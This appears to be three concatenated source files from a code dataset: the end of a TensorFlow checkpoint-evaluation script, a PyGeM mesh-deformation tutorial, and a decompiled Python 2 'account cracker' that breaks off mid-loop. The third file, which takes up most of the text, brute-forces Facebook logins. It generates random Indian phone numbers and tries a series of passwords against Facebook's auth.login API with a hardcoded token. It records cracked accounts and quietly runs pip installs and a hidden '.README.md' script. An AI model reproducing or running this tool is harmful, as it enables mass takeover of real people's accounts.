metrics = model.create_metrics()
logging.info('Evaluating: "%s"', ckpt_name)
utils.do_evaluation(model, metrics, datasets, embedding_matrices)
  # This code assumes the checkpoint name contains the epoch and step in the
  # following format.
path_search = re.search(r'ep(\w+)_step(\w+)', ckpt_name)
epoch = int(path_search.group(1))
step = int(path_search.group(2))
to_write = collections.OrderedDict()
to_write['checkpoint'] = ckpt_name
to_write['epoch'] = epoch
to_write['step'] = step
for metric in metrics.values():
if metric.name in METRICS_TO_SAVE:
tf.summary.scalar(metric.name, metric.result(), step=step)
to_write[metric.name] = metric.result().numpy()
metric.reset_states()
  # Save the results to a text file.
with gfile.GFile(output_path, 'w') as f:
writer = csv.DictWriter(f, fieldnames=to_write.keys())
writer.writeheader()
writer.writerow(to_write)
def do_eval(checkpoint_paths, eval_dir, datasets,
embedding_matrices, sharded_eval=False):
"""Runs quantitative eval for each checkpoint in list."""
num_input_sentences = tf.compat.v1.data.get_output_shapes(
datasets['valid2018'])[0][1]
embedding_dim = tf.compat.v1.data.get_output_shapes(
datasets['valid2018'])[0][2]
for checkpoint_path in sorted(checkpoint_paths):
checkpoint_name = os.path.splitext(os.path.basename(checkpoint_path))[0]
logging.info('Processing checkpoint %s', checkpoint_name)
model = models.build_model(
num_input_sentences=num_input_sentences,
embedding_dim=embedding_dim)
checkpoint = tf.train.Checkpoint(model=model)
result = checkpoint.restore(checkpoint_path).expect_partial()
result.assert_nontrivial_match()
if sharded_eval:
num_shards = 10
for i in range(num_shards):
sharded_datasets = {
name: ds.shard(num_shards, i) for name, ds in datasets.items()
}
output_path = os.path.join(
eval_dir, '%s_metrics_shard.%02d.csv' % (checkpoint_name, i))
eval_single_checkpoint(
checkpoint_name, output_path, model,
sharded_datasets, embedding_matrices)
else:
eval_path = os.path.join(eval_dir, '%s_metrics.csv' % checkpoint_name)
eval_single_checkpoint(
checkpoint_name, eval_path, model, datasets, embedding_matrices)
def create_single_results_file(eval_dir):
"""Merges quantitative result files for each checkpoint into a single file."""
header = ''
to_save = []
for fpath in gfile.glob(os.path.join(eval_dir, '*metrics*.csv')):
if 'all_metrics' not in fpath:
with gfile.GFile(fpath, 'r') as f:
header = next(f)
to_save.append(next(f))
if to_save:
merged_metrics_file_path = os.path.join(eval_dir, 'all_metrics.csv')
with gfile.GFile(merged_metrics_file_path, 'w') as f:
f.write(header)
for data_line in to_save:
f.write(data_line)
def run_eval():
"""Evaluate the ROCSTories next-sentence prediction model."""
base_dir = FLAGS.base_dir
if FLAGS.output_dir:
eval_dir = FLAGS.output_dir
else:
eval_dir = os.path.join(base_dir, 'eval')
gfile.makedirs(eval_dir)
datasets, embedding_matrices = prepare_datasets()
if FLAGS.checkpoint_name is not None:
logging.info('Evaluating single checkpoint: %s', FLAGS.checkpoint_name)
checkpoint_paths = [os.path.join(base_dir, FLAGS.checkpoint_name)]
do_eval(checkpoint_paths, eval_dir, datasets,
embedding_matrices, FLAGS.sharded_eval)
elif not FLAGS.continuous:
logging.info('Evaluating all checkpoints currently in %s', base_dir)
checkpoint_paths = gfile.glob(os.path.join(base_dir, '*ckpt*.index'))
checkpoint_paths = [p.replace('.index', '') for p in checkpoint_paths]
do_eval(checkpoint_paths, eval_dir, datasets,
embedding_matrices, FLAGS.sharded_eval)
create_single_results_file(eval_dir)
else:
logging.info('Continuous evaluation in %s', base_dir)
checkpoint_iter = tf.train.checkpoints_iterator(
base_dir, timeout=FLAGS.timeout)
summary_writer = tf.summary.create_file_writer(
os.path.join(base_dir, 'summaries_eval'))
with summary_writer.as_default():
for checkpoint_path in checkpoint_iter:
do_eval([checkpoint_path], eval_dir, datasets,
embedding_matrices, FLAGS.sharded_eval)
    # Save a file with the results from all the checkpoints
create_single_results_file(eval_dir)
logging.info('Results written to %s', eval_dir)
def main(argv):
del argv
  # Load gin.config settings stored in model directory. It is possible to run
  # this script concurrently with the train script. In this case, wait for the
  # train script to start up and actually write out a gin config file.
  # Wait 10 minutes (periodically checking for file existence) before giving up.
gin_config_path = os.path.join(FLAGS.base_dir, 'config.gin')
num_tries = 0
while not gfile.exists(gin_config_path):
num_tries += 1
if num_tries >= 10:
raise ValueError('Could not find config.gin in "%s"' % FLAGS.base_dir)
time.sleep(60)
gin.parse_config_file(gin_config_path, skip_unknown=True)
gin.finalize()
run_eval()
if __name__ == '__main__':
app.run(main)
| StarcoderdataPython |
3361984 | <filename>examples/tutorial_1_stl.py
#!/usr/bin/env python
# coding: utf-8
r"""Tutorial 1 STL example"""
import pygem as pg
from pygem.utils import write_bounding_box
# Parameters that DO modify the shape
params = pg.params.FFDParameters()
params.read_parameters(filename='./tutorial_1_stl/parameters_test_ffd_sphere.prm')
# Create VTK files to compare the undeformed and deformed lattice in Paraview
write_bounding_box(params,
'./tutorial_1_stl/params.vtk',
write_deformed=False)
write_bounding_box(params,
'./tutorial_1_stl/params_deformed.vtk',
write_deformed=True)
# The params print themselves nicely
print(params)
# Parameters that DO NOT modify the shape
params_null = pg.params.FFDParameters()
params_null.read_parameters(filename='./tutorial_1_stl/null.prm')
# Read the STL file
stl_handler = pg.stlhandler.StlHandler()
mesh_points = stl_handler.parse('./tutorial_1_stl/test_sphere.stl')
# Display the unmodified sphere in 2 possible ways
stl_handler.plot(plot_file='./tutorial_1_stl/test_sphere.stl')
stl_handler.show(show_file='./tutorial_1_stl/test_sphere.stl')
# Apply the freeform transformation that does not change anything
free_form = pg.freeform.FFD(params_null, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
stl_handler.write(new_mesh_points, './tutorial_1_stl/test_sphere_null.stl')
stl_handler.plot(plot_file='./tutorial_1_stl/test_sphere_null.stl')
# Apply the freeform transformation that modifies the shape
free_form = pg.freeform.FFD(params, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
stl_handler.write(new_mesh_points, './tutorial_1_stl/test_sphere_mod.stl')
# Display the modified sphere in 2 possible ways
stl_handler.plot(plot_file='./tutorial_1_stl/test_sphere_mod.stl')
stl_handler.show(show_file='./tutorial_1_stl/test_sphere_mod.stl')
| StarcoderdataPython |
1798608 | <filename>bind/pypi_2.py<gh_stars>100-1000
# Decompiled by HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
#---------------------------------------
# Source File : a.py
# Time : Wed Sep 9 04:27:21 2020
#---------------------------------------
# uncompyle6 version 3.7.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15)
# [GCC 8.3.0]
# Embedded file name: <tahm1d>
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(98969):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(3.0 / 200)
def t():
time.sleep(1)
def cb():
os.system('clear')
logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[1;90m AUTOMATIC ACCOUNT CRACKER BY \x1b[1;96mBOTOL BABA\n\x1b[1;97m--------------------------------------------------\n\x1b[1;95m\n AUTHOR : <NAME>\n FACEBOOK : FACEBOOK.COM/THEMEHTAN\n YOUTUBE : YOUTUBE.COM/MASTERTRICK1\n GITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;32m\n--------------------------------------------------\n "
back = 0
successful = []
cpb = []
oks = []
id = []
def babaindseven():
os.system('clear')
print logo
print 'CRACK ONLY 7 DIGITS HACKABLE ACCOUNTS'
print
jalan('\x1b[1;91m [1] \x1b[1;93mSTART CRACK')
print
jalan('\x1b[1;92m [2] UPDATE TOOL')
print
jalan('\x1b[1;96m [3] BACK TO HOME')
print
jalan('\x1b[1;97m [0] EXIT')
print 50 * '-'
action()
def action():
global cpb
global oks
bch = raw_input('\n ===> ')
if bch == '':
print '[!] Fill in correctly'
action()
elif bch == '1':
os.system('clear')
print logo
print
try:
c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 954 TO 997 : ')
k = '+91'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
babaindseven()
elif bch == '2':
os.system('clear')
os.system('pip2 install --upgrade babaindseven')
os.system('clear')
print logo
print
psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY')
time.sleep(2)
os.system('python2 .README.md')
elif bch == '3':
os.system('python2 .README.md')
elif bch == '0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx)
time.sleep(0.5)
psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...')
time.sleep(0.5)
psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z')
time.sleep(0.5)
print 50 * '-'
print
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass4 + '\n')
okb.close()
oks.append(c + user + pass4)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
pass5 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass5 + '\n')
okb.close()
oks.append(c + user + pass5)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass5 + '\n')
cps.close()
cpb.append(c + user + pass5)
else:
pass6 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass6 + '\n')
okb.close()
oks.append(c + user + pass6)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass6 + '\n')
cps.close()
cpb.append(c + user + pass6)
else:
pass7 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass7 + '\n')
okb.close()
oks.append(c + user + pass7)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass7 + '\n')
cps.close()
cpb.append(c + user + pass7)
else:
pass8 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass8 + '\n')
okb.close()
oks.append(c + user + pass8)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass8 + '\n')
cps.close()
cpb.append(c + user + pass8)
pass9 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass9 + '\n')
okb.close()
oks.append(c + user + pass9)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass9 + '\n')
cps.close()
cpb.append(c + user + pass9)
else:
pass10 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass10 + '\n')
okb.close()
oks.append(c + user + pass10)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass10 + '\n')
cps.close()
cpb.append(c + user + pass10)
else:
pass11 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass11 + '\n')
okb.close()
oks.append(c + user + pass11)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass11 + '\n')
cps.close()
cpb.append(c + user + pass11)
else:
pass12 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass12 + '\n')
okb.close()
oks.append(c + user + pass12)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass12 + '\n')
cps.close()
cpb.append(c + user + pass12)
pass13 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass13 + '\n')
okb.close()
oks.append(c + user + pass13)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass13 + '\n')
cps.close()
cpb.append(c + user + pass13)
else:
pass14 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass14 + '\n')
okb.close()
oks.append(c + user + pass14)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass14 + '\n')
cps.close()
cpb.append(c + user + pass14)
else:
pass15 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass15 + '\n')
okb.close()
oks.append(c + user + pass15)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass15 + '\n')
cps.close()
cpb.append(c + user + pass15)
else:
pass16 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass16 + '\n')
okb.close()
oks.append(c + user + pass16)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass16 + '\n')
cps.close()
cpb.append(c + user + pass16)
pass17 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass17 + '\n')
okb.close()
oks.append(c + user + pass17)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass17 + '\n')
cps.close()
cpb.append(c + user + pass17)
else:
pass18 = 'password@'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass18 + '\n')
okb.close()
oks.append(c + user + pass18)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass18 + '\n')
cps.close()
cpb.append(c + user + pass18)
else:
pass19 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aab<PASSWORD>65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass19 + '\n')
okb.close()
oks.append(c + user + pass19)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass19 + '\n')
cps.close()
cpb.append(c + user + pass19)
else:
pass20 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass20 + '\n')
okb.close()
